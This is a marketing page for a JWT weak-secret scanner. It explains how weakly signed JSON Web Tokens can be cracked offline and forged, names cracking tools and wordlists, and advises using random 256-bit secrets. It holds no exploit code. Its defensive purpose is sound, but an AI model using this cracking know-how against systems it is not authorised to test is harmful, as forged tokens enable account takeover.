← Back to All Scanners
AuthenticationHigh Severity

JWT Weak Secret Scanner

Brute forces weak JWT signing secrets for token forgery.

Try This Scanner

What is JWT Weak Secret?

JWT Weak Secret vulnerabilities occur when applications use predictable, short, or common secrets to sign JWTs. Attackers can capture a valid JWT and attempt to crack the secret offline using wordlists and brute force. Once the secret is discovered, they can forge arbitrary tokens and bypass authentication entirely.

Why is This Important?

Many applications use weak JWT secrets like 'secret', 'password', or company names. Cracking these secrets takes seconds to minutes with tools like hashcat or jwt-cracker. Once compromised, attackers can impersonate any user, including administrators, and the attack is completely invisible to the application.

How It Works

1. Auth Flow Analysis

Maps authentication mechanisms including login, registration, password reset, and session management flows.

2. Security Testing

Tests for authentication bypasses, weak credentials, session flaws, and token vulnerabilities.

3. Access Verification

Validates findings by demonstrating unauthorized access or privilege escalation paths.

Key Capabilities

Comprehensive authentication security testing to protect user accounts and prevent unauthorized access.

  • Complete authentication flow analysis
  • Token and session security validation
  • Password policy and brute-force testing
  • Multi-factor authentication bypass detection
  • OAuth, SAML, and JWT security assessment

Frequently Asked Questions

How fast can JWT secrets be cracked?

Common passwords crack instantly. Short secrets (< 10 characters) can be brute-forced in minutes to hours. GPU-accelerated cracking with hashcat achieves billions of attempts per second for HS256. A strong 32+ character random secret is effectively uncrackable.

What makes a JWT secret weak?

Weak secrets include: dictionary words, company/app names, short strings, patterns (123456, qwerty), secrets in code repositories, default values from documentation, and anything that might appear in a wordlist or be guessable.

What tools are used to crack JWT secrets?

Popular tools include: hashcat (GPU-accelerated, fastest), john the ripper, jwt-cracker, jwt_tool, and custom scripts. Wordlists like rockyou.txt and SecLists contain millions of common passwords and patterns.

How should I generate a strong JWT secret?

Generate at least 256 bits (32 bytes) of cryptographically random data. Use openssl rand -base64 32 or similar. Never use human-readable phrases. Store secrets in secure secret management systems, rotate them periodically, and never commit them to repositories.

Related Scanners

JWT None AlgorithmCritical
Learn more →
JWT Algorithm ConfusionCritical
Learn more →
JWT Key InjectionCritical
Learn more →
JWT Expiration BypassHigh
Learn more →

Ready to secure your application?

Start testing for jwt weak secret vulnerabilities today.

Get Started Free